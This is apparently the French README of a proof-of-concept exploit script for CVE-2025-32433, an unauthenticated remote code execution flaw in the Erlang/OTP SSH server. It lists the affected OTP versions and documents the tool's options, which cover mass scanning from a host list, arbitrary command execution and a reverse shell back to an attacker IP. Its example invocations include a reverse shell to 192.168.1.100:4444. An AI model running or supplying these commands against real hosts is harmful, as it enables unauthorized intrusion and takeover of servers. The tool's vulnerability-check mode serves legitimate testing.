
La vulnérabilité permet à un attaquant ayant un accès réseau à un serveur SSH Erlang/OTP d'exécuter du code arbitraire sans authentification préalable.
La vulnérabilité permet à un attaquant disposant d'un accès réseau à un serveur SSH Erlang/OTP d'exécuter du code arbitraire sans authentification préalable.
Une vulnérabilité grave a été identifiée dans le serveur SSH Erlang/OTP qui pourrait permettre à un attaquant d'effectuer une exécution de code à distance non authentifiée (RCE). En exploitant une faille dans le traitement des messages du protocole SSH, un acteur malveillant pourrait obtenir un accès non autorisé aux systèmes affectés et exécuter des commandes arbitraires sans informations d'identification valides. Cela pourrait entraîner une compromission desdits hôtes, permettant un accès non autorisé et une manipulation de données sensibles par des tiers, ou des attaques par déni de service.
OTP-27.3.2 et versions antérieures
OTP-26.2.5.10 et versions antérieures
OTP-25.3.2.19 et versions antérieures
python cve-2025-32433.py <host> [options]
Options :
-p PORT, --port PORT : Port SSH (défaut : 22)
-t TIMEOUT, --timeout TIMEOUT : Délai d'attente de connexion en secondes (défaut : 5)
-c COMMAND, --command COMMAND : Commande personnalisée à exécuter
--check : Vérifier si la cible est vulnérable
-u urls.txt, --urlfile urls.txt : Fichier contenant la liste des hôtes à scanner (un par ligne)
-o output.txt, --output output.txt : Fichier de sortie pour stocker les résultats.
--shell : Lancer un shell inversé
--lhost LHOST : IP de l'attaquant pour le shell inversé
--lport LPORT : Port de l'attaquant pour le shell inversé (défaut : 4444)
python cve-2025-32433.py 127.0.0.1 --check
python cve-2025-32433.py 127.0.0.1 -c 'cat pwned.txt'
python cve-2025-32433.py 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444